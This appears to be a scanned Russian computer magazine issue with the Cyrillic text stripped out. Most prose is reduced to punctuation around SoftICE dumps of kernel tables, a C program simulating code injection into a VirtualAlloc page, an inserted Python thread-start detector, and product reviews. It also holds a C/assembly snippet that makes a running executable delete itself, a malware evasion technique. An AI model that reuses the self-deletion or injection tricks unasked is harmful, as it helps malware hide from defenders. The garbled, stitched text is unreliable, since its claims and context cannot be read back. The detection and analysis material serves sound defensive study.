0008:8046AB80 804704D8 00000000 000000F8 804708BC ..G...........G.
:d 804704D8
0008:804704D8 804AB3BF 804AE86B 804BDEF3 8050B034 ..J.k.J...K.4.P.
0008:804704E8 804C11F4 80459214 8050C2FF 8050C33F ..L...E...P.?.P.
0008:804704F8 804B581C 80508874 8049860A 804FC7E2 .XK.t.P...I...O.
:u *(804704D8 + 97*4)
ntoskrnl!NtQuerySystemInformation
0023:804BF933  PUSH EBP
0023:804BF934  MOV  EBP, ESP
0023:804BF936  PUSH FF
0023:804BF938  PUSH 804043A0
0023:804BF93D  PUSH ntoskrnl!_except_handler3

(8)
, NTOSKRNL.EXE
.data:004704D8 BF B3 4A 00    _KiServiceTable dd offset _NtAcceptConnectPort@24
.data:004704DC 6B E8 4A 00                    dd offset _NtAccessCheck@32
.data:004704E0 F3 DE 4B 00                    dd offset _NtAccessCheckAndAuditAlarm@44

(9)

SDT-, NTOSKRNL.EXE
.data:0046AB80 ; Exported entry 516. KeServiceDescriptorTable
.data:0046AB80                 public _KeServiceDescriptorTable
.data:0046AB80 _KeServiceDescriptorTable dd 0

(10)

IDT soft-ice
:IDT
IDTbase=80036400  Limit=07FF
Int   Type    Sel:Offset      Attributes  Symbol/Owner
0000  IntG32  0008:804625E6   DPL=0  P    ntoskrnl!Kei386EoiHelper+0590
0001  IntG32  0008:80462736   DPL=3  P    ntoskrnl!Kei386EoiHelper+06E0
0002  IntG32  0008:0000144E   DPL=0  P
0003  IntG32  0008:80462A0E   DPL=3  P    ntoskrnl!Kei386EoiHelper+09B8

(11)

,
.
. ,
, . , , BSOD,
...
, soft-ice + IceExt
( )
.
.

( ), . .

VirtualAllocEx, WriteProcessMemory CreateRemoteThread. , ,
EIP SetThreadContext
(, GetThreadContext), , CreateThread, EIP . NT, 32-
Windows.
?
, , ,
.
, . !
. , ,
.
.
! , . ?! ,
SHLWAPI.DLL, RPCRT4.DLL OLE32.DLL, , .

( , API).
- ,
.
, 3- .
-


( .code .text),
, , VirtualAllocEx. ,
. Softice ,
OllyDbg PE-TOOLS.
OllyDbg file attach
, .
view  memory <ALT-M>.
.
, Priv ( private), , map ( mapping)
, CreateFileMapping/MapViewOfFile, Imag (
imaging) .
PE-TOOLS

dump region,
OllyDbg, .
, .

( ),
#include <stdio.h>
#include <string.h>
#include <windows.h>

// thread body: an endless loop, so the thread stays alive while it is inspected
DWORD WINAPI thread(LPVOID param)
{
    while (1);
    return 0;
}

int main(void)
{
    void *p;
    DWORD tid;

    // an ordinary thread: its start address lies inside the .text section of the image
    CreateThread(0, 0, thread, (LPVOID)0x999, 0, &tid);

    // imitate malware: copy the thread body into a private RWE page obtained
    // from VirtualAlloc and start a thread there, outside any module image
    p = VirtualAlloc(0, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(p, (const void *)thread, 0x1000);
    CreateThread(0, 0, (LPTHREAD_START_ROUTINE)p, (LPVOID)0x666, 0, &tid);

    // wait for ENTER so the process stays alive for the debugger
    getchar();
    return 0;
}

, , soft-ice, THREAD -x ( )
( 1).
Soft-ice ,
KERNEL32.DLL. , Process Explorer ,
Microsoft (
Windows NT Internals). ( )
Process Explorer, ,
va_thread.exe ( ), Properties Threads.
? . : va_thread.exe+0x1405,
, ( , hiew'). : va_thread.exe+0x1000 (, -, hiew'), KERNEL32.DLL+0xB700 (
), !
OllyDbg
,
.
va_thread.exe, view
thread ... ( ), ( 2)!
(entry)
50Ch, , , OllyDbg.

, ...
c 558h (,

) ,
( )
, , .
( 3).
,
. , ( ,
999h),
(
401000h), ( , ,
,

, ).
55Ch.
, ( ), ( 4).
666h , , 520000h , ( )
, VirtualAlloc
( 5).
578h, , (!)
( 6).
, ,
. ,
, . OllyDbg Follow in Disassembler ( ) , , .
, . . ,
(
- , ).

PUSH EBP/MOV EBP, ESP
(55h/8Bh ECh), jump , , , jump,
, jump .
, , .
,
. 100%,
. , , , backdoor, .
, () , , (DELPHI, Visual BASIC).
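As an added example (not code from the article), here is the thread-start check the text performs by hand, written in Python over a memory map transcribed from the OllyDbg listings on this page; the region tuples, the thread list with its first bytes, and the function names are this example's own constructions.

```python
# Constructed memory map for va_thread.exe, transcribed from the OllyDbg
# listing on this page: (base, size, owner, section, type, access).
# Only the regions that listing shows are included, so addresses inside
# system DLLs such as KERNEL32 come back as "unmapped" here.
VA_THREAD_MAP = [
    (0x400000, 0x1000, "va_threa", "PE header",    "Imag", "R"),
    (0x401000, 0x4000, "va_threa", ".text",        "Imag", "R"),
    (0x405000, 0x1000, "va_threa", ".rdata",       "Imag", "R"),
    (0x406000, 0x2000, "va_threa", ".data",        "Imag", "R"),
    (0x410000, 0x2000, "",         "",             "Map",  "R"),
    (0x51E000, 0x1000, "",         "",             "Priv", "RW Guar"),
    (0x51F000, 0x1000, "",         "stack of thr", "Priv", "RW Guar"),
    (0x520000, 0x1000, "",         "",             "Priv", "RWE"),
    (0x62E000, 0x1000, "",         "",             "Priv", "RW Guar"),
]

# Thread start addresses from the text (thread id, start EIP, first bytes at
# the start address). The bytes are the PUSH EBP / MOV EBP,ESP / MOV EAX,1
# prologue shown in the disassembly of the 999h thread; the 666h thread runs
# a byte-for-byte copy of it, so the same bytes sit at 520000h (constructed).
VA_THREAD_THREADS = [
    (0x558, 0x401000, bytes.fromhex("558BECB801000000")),  # 999h thread, in .text
    (0x55C, 0x520000, bytes.fromhex("558BECB801000000")),  # 666h thread, VirtualAlloc'd page
    (0x578, 0x401405, b""),                                # <ModuleEntryPoint>, bytes not captured
]

# Standard compiler prologue PUSH EBP / MOV EBP,ESP (55 8B EC).
PROLOGUE = bytes([0x55, 0x8B, 0xEC])


def find_region(regions, addr):
    """Return the map entry containing addr, or None when the address is unmapped."""
    for region in regions:
        base, size = region[0], region[1]
        if base <= addr < base + size:
            return region
    return None


def classify_thread(regions, start, first_bytes=b""):
    """Classify a thread by where its start address falls in the memory map.

    Returns (verdict, reason); verdict is "image", "injected" or "unmapped".
    first_bytes, when given, are the bytes at the start address and feed the
    prologue heuristic described in the text.
    """
    region = find_region(regions, start)
    if region is None:
        return "unmapped", "start address %08X lies outside every mapped region" % start
    base, _size, owner, section, kind, access = region
    if kind == "Imag":
        reason = "inside module %s, section %s" % (owner, section or "(header)")
        if first_bytes and not first_bytes.startswith(PROLOGUE):
            reason += "; no PUSH EBP/MOV EBP,ESP prologue, verify it is a function start"
        return "image", reason
    # Map and Priv regions belong to no loaded module: code executing there was
    # copied in at run time (VirtualAlloc + memcpy in the test program).
    reason = "%s region at %08X owned by no module, access %s" % (kind, base, access)
    if "E" in access and first_bytes and first_bytes.startswith(PROLOGUE):
        reason += "; starts with a compiler prologue, i.e. a copied function body"
    return "injected", reason


def report(regions, threads):
    """Map each thread id to its (verdict, reason)."""
    return {tid: classify_thread(regions, start, fb) for tid, start, fb in threads}


if __name__ == "__main__":
    for tid, (verdict, reason) in report(VA_THREAD_MAP, VA_THREAD_THREADS).items():
        print("thread %03X: %-8s %s" % (tid, verdict, reason))
```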


, ,


, , , , .
SST.
, , NtQuerySystemInformation.
NTDDLL.DLL ,
,
INT 2Eh (NT, W2K),
SYSENTER (XP ) ( 7).
, (ring 3) (ring 0), KiSystemService, NTOSKRNL.EXE
( SDT
System Descriptor Table). , win32k.sys, .
IIS, .
, , System Service Table (
),
,
(,
,
, PhysicalMemory). . NTOSKRNL.EXE

SDT Restore

LoadLibrary ,
, KeServiceDescriptorTable
GetProcAddress ( ). SST,

: addr ==
*(DWORD *)(KeServiceDescriptorTable[0] + N*sizeof(DWORD)). N , addr
( 8).
SST softice, NTCALL.
NTOSKRNL.EXE, , - . ,
-
, , .
SST
, NTOSKRNL.EXE, , ,
.
,
http://msdl.microsoft.com/download/symbols dbghelp.dll,
Debugging Tools. SST _KiServiceTable ( 9).
? KeServiceDescriptorTable ( , x86,
). mov
[mem], imm32 SST (imm32), KeServiceDescriptorTable[0]. , SDT KiInitSystem ( 10).
SST ,

Win2K/XP SDT Restore Tan Chew Keong.
SDT Restore, , rootkit', . -, SST
SDT Restore , , KeServiceDescriptorTable[0],
( http://hi-tech.nsys.by/35/). -, SST PhysicalMemory, native-API NtMapViewOfSection, -

, .
, NtMapViewOfSection
PhysicalMemory. , , , ( www.rootkit.com/newsread.php?newsid=200).
, , IDT, , , .
IDT ( soft-ice)
NTOSKRNL.EXE HAL.DLL ( 11).
, ( !)
jump , SST/IDT.

NTOSKRNL.EXE,
PETOOLS eXtreme Dumper
soft-ice ( )
IceExt IceDump.
.
,
,
(
IE NT). - , ,
, crack', ,
. IE
Lynx, , NT
, ,
. , - .
, , , soft-ice

www.runtime.org/gdbnt.zip
ntexplorer
www.ollydbg.de
ollydbg
www.sysinternals.com/utilities/processexplorer.html
process explorer
http://stenri.pisem.net
iceext
http://programmerstools.org/system/files?file=icedump6.026.zip
icedump
www.wasm.ru/baixado.php?mode=tool&id=124
pe-tools (base)
http://neox.iatp.by
pe-tools (updates)
http://neox.iatp.by/extremedumper.zip
extremedumper
www.security.org.sg/code/sdtrestore.html
sdt restore

15% ,

,


1 .
2 .
3
:
: subscribe@glc.ru;
: (495) 780-88-24;
: 119021, , . , . 11, . 44-45,
, .
!
.
, ,
5 .
,
20 .
.
,
. ,
, .

: - (495) 500-00-60 www.interpochta.ru
,
, , ,
.



+ CD

6
12
900 . 00 .
1740 . 00 .


+
+

6
12
2550 . 00 .
5040 . 00 .
:
+ CD
+ +


200 .


( . )
*
( )

...

:

/
(
)
e-mail

* .

.

, ,
: 8(495)780-88-29 ( )
8(800)200-3-999 ( , ,
).
: info@glc.ru



...

, ,
, SPYWARE,
,
DEEONI$
deeonis@gmail.com, icq: 982-622

Spyware adware
. ,
, .


. ,
.
,
.
,
, , .
antispyware.
,
aspyware, ,
.
, , , , C++ Delphi,


spyware. , ,
, -

, ,
.
spyware. ,
aspyware . , , !
. ,
, . ,
(- )
. , , ,
,
, , ..

, ,
. : exe, dll. spyware, ,

. ,
Run. , dll explorer.exe.
spyware adware COM-. ,
, COM- GUID. GUID (Globally Unique Identifier)
, ,
. GUID HKCR\AppID. .
spyware (
,
).
, BHO


(Browser Helper Object ( )).


,
spyware.
,
. ,
, , ,
,
.. ,
, spyware
. , . , .
, , spyware , .
,
, ,
.
,
, .
,
. ,

:
icq- Miranda
.
. ,
.

. , ,

,
, ..
, . , ,
spyware...
:
spyware . . , , , -

. , ,
-
. spyware ,
. , ,
. ,
, spyware,
.
, .
, ,

spyware
. : ?. ,
spyware, ,
. ...
.
, , 1: . -

Microsoft spyware

$150k

.
, IE, 150000$ . , .
, , . -.
, ,
. - , ,
,
,
29,99$, . , ,
, ,
. -:
.

, ,
, , - .
? , ,
.
, , ,
,
.
, ,
.
. ,
, ;).
. , , ,
, spyware
. ,

.

,
. .
, ,
,
. , -


. , , , .
. , . , . , ... ! spyware ,
.

. ,
,
. , :
, . , ,
, , . .
, , . - ,
. ,
, , , .
, .
,
, , . ,
Tip of Day,
(
), , . baloon,
, .
spyware,
,
. , ,
.
,
spyware, .
, . ,
, ,
. ,
.
,
-

. :

.
, .

. 90% : ,
.
, ,
,


,
AVZ
,
SPYWARE?

spyware,
.
:
1
, cookies.
url cookie,
,
(
) spyware . .
antispyware
,
.
2
.

software\gator clsid,

spyware-,
-

.




.
.
3
.

,

,
.

,

,
(
clsid

).
4
, , .
-


,
: ,
..

.

spyware ,

, . ,

hoax-
, , -
.. -,

. hoax-
,
.



, , ,

, ,
.
,
,
. , , 6 !!!

30% .
. - ,
, . , . , , ,

.
, .
, spyware , - ,
. ,
.
.
,
?
2 ( ), , ,
.
, ,
: . , ,
.
. ,
,
, . , spyware
, ? : .
.
,
,
.
, , antispyware, .
,
... ,
, -


spyware
, .
,
,
: !...
,
,
, .
SPYWARE.
, , .

,
. , . , ,
.
. ,
, .
, .

,


800 .
, .

, , ...
.

, . (

).
, , , - . ,
. . ,
, , . ,
, , , . ,
,
.
spyware ,
, ,
, ,
.
, spyware , ,
,
2000. ,
( ,
),
adware,
. ,
, , ,
. -
, , .
. , , ,
spyware .
, MSDN. !

. -, , .
, . -,
.

. ,
,
, . ,
, . , .

spyware.



ANTI-SPY.INFO
,
,
. ANTISPY.INFO

no e-mail

,
, . , .

. () /, ( . wrapper ),
.
crack' (
) - . : . (
) Win32.HLLM.Beagle, Packed.Win32.Klone.g
. . ,

,
.
, ( ), ,
.
,
( )
.
.
-, . , . -, , -
(
,
). -, Packed.Win32.Klone.g, , TrojanDropper.Win32.Agent.arz, ,
.
, , ...
Dr.Web , , , ,
-.
, ! , . AVP ActiveX 8 26 (
), CureIt! Dr.Web ,
, , .
.
. ,

. , -


,
.
, DR.WEB.

( ), .
! ,
, soft-ice
.
, .
, , , ,
, , ! , , ?! Windows , .
, DLL .
, ,
,
( , , / . .),
( -
).
,
, , (
). (
) ,
Windows ,
MS-DOS.
, , , Anti-Spy.Info.
. Anti-Spy.Info
www.Anti-Spy.Info,
(
$29) 30 ,
. .
1.6.5, , ASProtect' soft-ice ! , -

//,
ASProtect', soft-ice .
1.1,
soft-ice. Anti-Spy.Info ,
.

, ,
IE,
, ,
potentially dangerous
( ),
harmless (). ! , Anti Spy.Info // , . .
Anti-Spy.Info.
, (AntiSpy.Info ), .
. Anti-Spy.Info html-

Anti-Spy.Info

txt-, , , , .
. ,
, ,
. - ,
( Windows ) ? , .
. , Anti-Spy.Info,

wmfhotfix.dll, ( 82%) :

(
);
(
WMFHOTFIX.DLL
,
GUI-,
);
,

,

,
,
;
WINDOWS;

( ?!).


Anti-Spy.Info

, , ,
. , ...
,
, Anti-Spy.Info ( ASCII), , Copyright
2006 by Ilfak Guilfanov, ighexblog.com http//ww.hexblog.com. , wmf-, IDA Pro . ,
,
. Google it

http://www.neuber.com/antispy/file, .
:
. ,

X-Safe IV , ,

- , . 193 , 4 , 2
2 . 7
, , Windows.
SSSensor.dll, , , (function: record input
Properties, )
, API- UnhookWindowsHookExgSetWindowsHookExA,
, Anti-Spy.Info 82% (
). Google it,
, 678 , ,
. - , Panda, - Bullguard,
VCOM SyGate Personal Firewall. ,
, , SSSensor.dll .
, , , .

, - rootkit' ( ). ,

Comment
,
(

).
(
harmless ).
SSSensor.dll (
Rating
, ).
Anti-Spy.Info . , , . Win32.HLLM.Beagle,
- .
Anti-Spy.Info , Beagle.exe , RAR-, , , 57%. hldrrr.exe,

WINNT\System32
,
(HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKLM\Software\Microsoft\Windows\CurrentVersion\Run), 47% (seems harmless ).
,

, ,
. ! ,
( ) Anti-Spy.Info, ,

, - , .
, Anti-Spy.Info . , , . , , Anti-Spy.Info , .
, Windows , . hldrrr.exe hldrrr.ex_ ,
, ! , -


- .
(
, ), Quarantine,
Restore. Delete.
, Anti-Spy.Info .
, -
, Windows ,
Anti-Spy.Info, . , , Windows PE, Barn PE Live CD, AntiSpy.Info, , ... ,
.
Anti-Spy.Info , IE, ,
! IE- Anti-Spy.Info
(
70%), : Fresh
Download Catcher Module, ReGetApi Module, Adobe
Acrobat IE Helper Version X for ActiveX ..
, ,

IE . , 5- ,

, .
:
Fresh Download 4- IE
, 5-
, .
, IE
? ,
Anti-Spy.Info , .
. Anti-Spy.Info ,
(
) ,
. , ,
, , , .
, , ,
( ) , , . ,
, rootkit', .

.
,
. Anti-Spy.Info

,
,
,
.

,

,
,
,

11- .
.

,

.

: ,
,
, ,

-.
, ,
.
:
, .
. - ,
- , .


,
.
,
,
,
, ,
...

. -
, -
. -.
.
,
. ,
, . TV,

10 . ,
100 .

. ,
,
.
company.drweb.com/press/igor+daniloff+cnews+
interview+may+2006

AVP Trojan-Downloader.Win32.Bagle


,
SPYWARE
//
.
. ?

no e-mail
, , ,
,
. (
stealth- ),
. (
), DELPHI Visual Basic'.
, .

DELPHI Visual
Basic' . , , .
.
, , , , , , ,
- , , ,
.

, .
, ,
. ... !
( )
- , IBM PC .
OneHalf.
VM Ware
-


(98, W2K, XP, Server 2003) .


, , .
, ,
: ,
, ,
, . -

,
, --.
, .
,
.

, !
, Pentium-4, 100% Pentium-II/III,
.
. ,
, .

.
, . ( ), ,
(!), ,
, .
. (AVP,
Dr.WEB) ,
, ,
.
,
.
( 10
), , (
Norton' ).

, , . -

( VersionInfo)


. -
. !
, !
Microsoft, ? , . (airplane rule) ,
: , ,
.
. API WINDOWS UNIX.
,
, .

. , , - , -

. ,
WINDOWS,
... .

, . (
),
.
.
, , Windows
( ),
Anti-Spy.Info
.

, Microsoft. - :). , googl'
.
ATI . Matrox ,
:).
Microsoft ,
, , .
. , Windows, ... .
! ,
,
Microsoft Visual Studio
. - ,
.


.
Windows ,
, ( MS-DOS)
.

,
.
WINNT\System32 FAR',
<CTRL-F8> , , ...
. KERNEL32.DLL (
Windows)
API SetFileTime, - .
SetFileTime,


BOOL SetFileTime(
    HANDLE hFile,                        // handle to the file
    CONST FILETIME *lpCreationTime,      // time the file was created
    CONST FILETIME *lpLastAccessTime,    // time the file was last accessed
    CONST FILETIME *lpLastWriteTime      // time the file was last written
);
. , . NTFS- , API ,
. ,
.
, ! ,
,
, .
.
,

100% , , .
.
. exe ,
,
, ,

. , bat-, (
). Windows 9x/NT, , . 9x
FreeLibrary, NT W2k UnmapViewOfFile. ,
,
. DeleteFile ExitProcess
. ? ,
, .
,
module = GetModuleHandle(0);
GetModuleFileName
(module, buf, MAX_PATH);
if(0x80000000 & GetVersion())
{
// Win9x
fnFreeOrUnmap = FreeLibrary;
}
else
{
// WinNT
fnFreeOrUnmap = UnmapViewOfFile;
CloseHandle((HANDLE)4);
}
__asm
{
lea eax, buf
push 0
push 0
push eax
push ExitProcess
push module
push DeleteFile
push fnFreeOrUnmap
ret
}
. , ret , , fnFreeOrUnmap, , Windows, FreeLibrary, UnmapViewOfFile. ,
: , DeleteFile , module
. ,

(
DeleteFile)
4 ( ).
, DeleteFile
: , ExitProcess , push eax
, ! ,
,
.
( ) ExitProcess, , .
! bat (,
, ). - ( ),
UnmapViewOfFile
exe-? NT W2K , - ( PE-) UnmapViewOfFile . XP,
, UnmapViewOfFile, .
,
, . , ,
, .
. ,
, , , Process
Explorer (OlyDbg, soft-ice). , ,
, 99% VirtualAlloc/VirtualAllocEx,
,
DLL.
-
, DLL, Windows ( - )
LoadLibrary.
, , LoadLibrary,
LoadLibraryEx


. ,
DLL, - .

VirtualAllocEx. ,
CreateRemoteThread, , GetThreadContext
EIP.
, LoadLibrary DLL,
CreateThread, , , VirtualAllocEx, , CreateRemoteThread ( EIP ).
,
TerminateThread, , ...
, ( ).
, DEP, . !

. , 64- Windows
, API-
(,
64- , 32- , ).
, DEP. VirtualAllocEx, PAGE_READWRITE,
PAGE_EXECUTE VirtualProtectEx.
DEP PAGE_READ
PAGE_EXECUTE , : ACCESS
( /
) write ( / ). EXECUTE , .
80386
, (, ) . , PAGE_EXECUTE
win32
,
.
DEP
( ), PAGE_EXECUTE .
PAGE_EXECUTE_READWRITE? VirtualProtectEx , -

msblast, ,

. , , Microsoft ,
, .
,
.
? ! . ,
-. VirtualAllocEx
DLL, ,
API- SetTimer,
, ( , ). , .
, . ,
...
.
,
API- GetWindowLong GWL_WNDPROC, ( ) SetWindowLong.
(

, ), , , . , , soft-ice, :
- DLL?
, ,
DELPHI.
.
, .
, , / , ,
/ CALLBACK.
,

,
, CALLBACK-, . ,
,
.
.
, , .

. ,
. . . . ,


( , , , ),
,
, :). ,

,
- .
, !
. ,
,

ADAWARE, SPYBOTA?


c

,
AVZ.

.

: ,
, ADAware.
... ! , . ,
,
.
( , ).
AVZ , LSP, .
AVZ ,

.
AVZ,

. AVZ ,
.
ADAWARE ,


TRACKING COOKIES. ,
, ,
NOT-A-


VIRUS-MIRC-6.12 :).

, . , ,
, -
, , - ,
-, .
.
,
-, .
, , , . , , - (AVZ).


,
,
SUPER_SYSTEM_MIRROSOFT_32.EXE,
.
, ?
?

:
. -, ,
,
. -,

.
: ,


.
, ...
virusinfo.info , AVZ .
. ,

. AVZ : ,
DLL, .
-
, -,
.
,
EASTER EGG, -
-?
, ?

: , , ,
... : , , ,
,
2-3 -. , .
,
, ,
.
:(.
!
.

: . . :
. , .
- . . ,
, ... AVZ
, , , .

,
?

?

: - AVZ . -

,
,
. AVZ
- -.

. ,
.

,
- - , . , , ,
,
. ,

, .
, ,

,
. .
malware adware/spyware, Downloader, RemoteAdmin
. AVP , .
, -.
,

?

:
IBM PC . ... ,
:
, .

),

,
?

: , .
: ... . , , .... BMP' 2 , ,
.
.
? :).


SPYWARE ANTISPYWARE ?
- .

: spy-, ,
, ... , . ( VBA, http://anti-virus.by/). VBA
malware

,
, , . , , adware

: . , -
, ( IDA), SoftICE .
,
.
C .

Windows ,
. API Windows NT/2000 Windows 2000 . .
.
,
,

.
, :
,

- ?

: :
? :) ,


www.kaspersky.ru

,


,
,

, .

www.viruslist.com/ru/.

www.viruslist.com/ru/news.
-

www.bugtrack.ru
,


.

,

.
,
, -

:
, ,
,
,
.
,
( , , ),

.
- 20 // .
www.kaspersky.ru/
virusscanner,
.

, ,
.
.
.


www.xakep.ru
, bugtrack
.

.
//. ,
2005
(www.xakep.ru/magazine/
xa/078/076/1.asp)
IRC-

www.progz.ru
, , ,
, ,
.
: Windows,
,
-,

UnrealIRCD. , -
:).
2006
(www.xakep.ru/magazine/
xa/089/060/1.asp)

Win32.Mytob.D. ,

,
:).
, .
:
PDF- (
).

,
*nix, , ,
- .

,
,
.
-
, -,
, .


(www.progz.ru/forum/index.php?sh
owforum=42),
3000 .

www.cracklab.ru


, .

,

.
.
// , .

www.hijackthis.de
,
MS ,


hijack.
, ,
..

, , . : IDA
Pro, Quick
Unpack, PEiD, WinUpack
.

, Delphi,
C/C++ PHP. .

HijackThis (http://download.
hijackthis.eu/hijackthis_199.zip)
,
.

hijack, -
. , -
,
.


IT 20 .

,

,

.
Novell/
3com/Bay/Siemens/Cisco/
ISACA.

-
Secproof Oy
(www.secproof.com).

Arhont.com, iPRO.lv.

-
Cisco
Systems. Cisco


.

IT-
.

.


.

: ,
UNIX,
...

.

,
-8
,

.

,

W2K,
FreeBSD 4.5.
,


, Y2K?

: ,
Microsoft,
. , ,
. , , .
, , web- , . , . , . ,
, . ( , ), . ,
.
:
,


, spyware . ( )
, , ,
. .
. , (, -), ,
. - (Apache) - (IE) , ! , , , , , ,
.
.
: , .
. , ,
.
, - . . , -, , , , . . ,
.
: , . Y2K, IT
. Y2K, . , antivirusi/firewall' . ,
, . - (Y2K ) ()
. , , . , ,
, proxy/firewall's.
, , .
OS, , , , , .


,
, , ?

: (,
: , . .),
. , . (
, ) , .
, ? , , . . ? , shell-
. , honeypot' ( , ), . , , , , , , , , .
: , , . , - .
all-in-one. . -. , , , , . .
, , , , . , , ,
. .
: , , security, . -,
, .
, , , . , - .


, ,
.
, . , ,
.
: , spyware, . - . ,
. BHODemon, spyware, Browser Helper Objects. , service pack' .. , spyware .
. , . ,
, . spyware.
: Spyware/mailware/virus
. (
), , ,
( ), (tracing). . , ,
, . (anti-spyware/anti-trojans) : ( ) ,
, , .
mailware/adware. , .
. , . ,
. . , , .
MICROSOFT

?

: MS . -, , , , , . , , - : .
. , . MS, , . , -
XP . , , , , . , . MS
. . ...
: Microsoft , ;). , , , , .
: . , . , . , Microsoft'a . .
: . MS MS AntiSpyware, .. MS , , . ( , OneCare), , MS,
. , MS
, - - Microsoft.
.
: MS, , MS . - MS :). ,
MS-


.
(IE/Outlook) (data-objects parsing/handling) -. .
,

,

. ?

// ?

: . , , . : , .
, , .
, . ,
, ...
. IT- , . .
: Dr.Web.
. . ,
.
, . . , , ,
.
. .
: . - .
, , - , 100% .
. , ,
, .
: firewall' , . ,
. .
: , , , . ( IE //).
, ,
VM Ware. ,
, . - . ( ),
.
: , , , , . , FreeBSD ( ,
) Mutt, .
: Symantec Antivirus . , , . , .
: -, ,
. Cisco Security Agent.
BHO-spyware BHODemon. , , . , , . , . .
, , ( ).
: Win , antispyware,
firewall ( Outpost Firewall Agnitum), , IE/MS win. application layer firewall - , , . Agnitum FW
- . , web browser'
, IE.
, , , . , , .


, ,
, , , , WebMoney, ,
. ,
.
?

X-Dragon,


,

,
,
. ,
: . , -, .
, ,

. ?
.
?
?

,

. , , (). ,
, .
, ++?

: , , , . , . ,
, , . - ,
... .

,
. , ++
, , ,
,
. ++
,

.

?

.
.
,
, -


, back-door' ..
, ,
.
Windows. . , /,
(, x8664), ,
, .


?

- ,
. -,

, . -, , ( ),
. -, -
SSE-, . SSE,
8086 (, ,
AAA) , , ,
,
. , ,
, .
,
,
.
?
?

. - .
.
, ,
, ,
. ,
, .
,
, ,
. ...

? .

,
winlogon' ,
( , ). .
, service pack'
, . .
,

?!

. ,
. ,
, . USB-
, . . .
,
. ,
,
. , IDE-, RAID SCSI? ( ) , , . ,
,
.
, .

, , , ,
. , - ,
!
, . ,
. , MS , ,
.


?

. ,
, jump
. , ?
,
jump',
NTOSKRNL.EXE,
. , /, , , . . , ,
, .
, - .

...

. ,
. ,
:
, IDE- Windows XP Professional ! , ( , . .).
, ,
. ,
. ...
?

.
OpenBSD, . ,
, Windows. , ,
,
.
?

,
( )
- .
, - .
, , , ...
,
. ...

hard
lcd20+
- 20

LCD 15 ,
, . ,
, , , , . , , .
.

. TFTtest , .
, , ,
.

. ,

, , .
, (, , ).
, . . : ,
. , . ,
, , (
). : , .
, , , , .

SAMSUNG
SyncMaster 204B
($562) 9

(): 20
: 1600 x1200
: 300 /2
: 800:1
: 5
( /
): 160/160
: D-SUB, DVI-D
: TCO03
:
: 444x 427.6x 200
: 7.7

. , , ,
:
,
. :

. , , ,
,
. :
, ,
. ,
Samsung SyncMaster 204b .
,
.
.
:
.
,

. ,
,
.

($730) 8

(): 20.1
: 1600 x1200
: 300 /2
: 700:1
: 16
( /
): 178/178
: D-SUB, DVI-D
: TCO03
:
: 442x 411x 278
: 9.6

. : ,
, , ,
. , , . -

SAMSUNG
SyncMaster 214T
($840) 9

(): 21.3
: 1600 x1200
: 300 /2
: 900:1
: 8
( /
): 178/178
: D-SUB, DVI-D
: TCO03
:
: 469x 466.2x 228.5
: 8.8

.

CRT-: , ,

.

.
:

. :
,

. RCA S-VIDEO,

: ,
,
,

: . ,
, , .
.
, -

, .
,
. ,
,
, ,

.

ECO Mode: ,
, , (
).
:
.
, Sony SDM-S205F
:

, ,
. . Sony SDM-S205F ,
,
. , .
. :

.
.

.
.


SONY SDM-S205F


ACER AL2416
($1016) 8

(): 24
: 1920 x1200
: 500 /2
: 1000:1
: 6
( /
): 178/178
: D-SUB
: TCO03
:
577 457 221
: 9.1

. ,
.
:
,
. , , . ,

.

, .
.

,
. ,
.
,
, .
,
,
.

($898) 8

(): 20.1
: 1600x1200
: 300 /2
: 1000:1
: 8
( / ): 170/170
: D-SUB, DVI-D


,
,
. ,
,
.
USB-
.
.

. ,
, ,
,
.
:
.
, -

.

.


ViewSonic VP2030b

: TCO99
:
: 468x 403x 315
, : 9

.
,

( ).
. :
,
,
. ,

NEC Multisync
20WGX2
($800) 9

(): 24
: 1680 x1050
: 470 /2
: 1600:1
: 6
( / ): 178/178
: D-SUB
: TCO03
:
: 471.4x 391.5x 203
: 7

.
:
,

, ,
NEC MultiSync 20WGX2 . :

,
. -

,
.

. .
USB
,

.

c, .
,

, .
.
,
(

).
,
.
,
.

BENQ FP202W

($528) 7

(): 20.1
: 1680 x1050
: 300 /2
: 600:1
, : 6
( / ): 170 x170

.
,
, .
( , ),

. -

: , , .

,
.

: D-SUB, DVI-D
: TCO92
:
: 396.7x 479.6x 169.9
: 5.7

. ,
1680*1050.
:
,
. , ,

.
.
, -

ACER AT2001
($590) 7

(): 20.1
: 800x 600
: 450 /2
: 500:1
: 16
( / ): 160/120
: D-SUB, RCA, S-VIDEO, TV, SCART
: TCO03
: 2 x3
: 495.9x 468.2 x198.4
: 7.8

. ,
!

,
RCA, S-VIDEO, SCART.
-, ,
. , .
-

. , ,
. :

. .
.
800x600, ,
ACER AT2001
.
,
: ,
.

. -
. : . , , ,
ACER AT2001 . , .
, , ,
.

NEC MultiSync 20WGX2, , Samsung SyncMaster 214T

hard
, !
ZYXEL P-660RU EE

:
: Ethernet, USB 2.0
: ADSL2+
: 24 Mbit/s
: 220
, telnet
: web-
DHCP:


?
,
? ADSL-
.
, , ,

,
.
Dial-Up
, LAN
ADSL.
ZyXEL, ,
,
,
.
? ( ) .
ADSL2+ ,
,
. , 1
USB, 1 RJ-45 Ethernet .
. USB
.
-

. , ,
, ,
DHCP .

( ).
: IP .
( , , ). , ZyXEL P-660RU EE
, (NAT) .
.
ADSL,
USB-,

, . ZyXEL P-660RU EE ,
,
. ( ), , ,

.
, ,
.

. .
,
-
.
, USB, ( USB-), . ZyXEL P660RU EE ,
,

. ,
, -

.
, ,
.
. ZyXEL
P-660RU EE ,
.

, . ,

ADSL (ASYMMETRIC DIGITAL SUBSCRIBER LINE)




.

(, )
( , ).
ADSL: DOWNLOAD 8 Mbit/s, UPLOAD 1 Mbit/s.
ADSL2+: DOWNLOAD 24 Mbit/s, UPLOAD 2 Mbit/s.
ADSL,
,
.
ADSL2+
.
Test_lab
ZyXEL Communications Corporation

soft
noname
NNM.RU
DOC@NNM.RU

Chat Watch v4.4.5


, -
. Chat Watch o
, .
WebMail Spy,
, . Chat Watch . ,
, AOL Instant Messenger, MSN Messenger Yahoo Messenger.
Chat Watch , . , , .
, , .
Chat Watch ( ), .

HDD Regenerator v1.51




.
,
. ,
. bad sector .
, .
FAT, NTFS ,
. - DS.

Sunbelt Network
Security Inspector v1.6.57.0

, 3000
. Network Security Inspector Windows-, IP-,
, Windows, MacOSX, Unix,
Linux .

.

.

,

pdf, xls,
doc, html, xml DB.
$1,495.00,
, :).

McFunSoft Video Convert Master 6.3


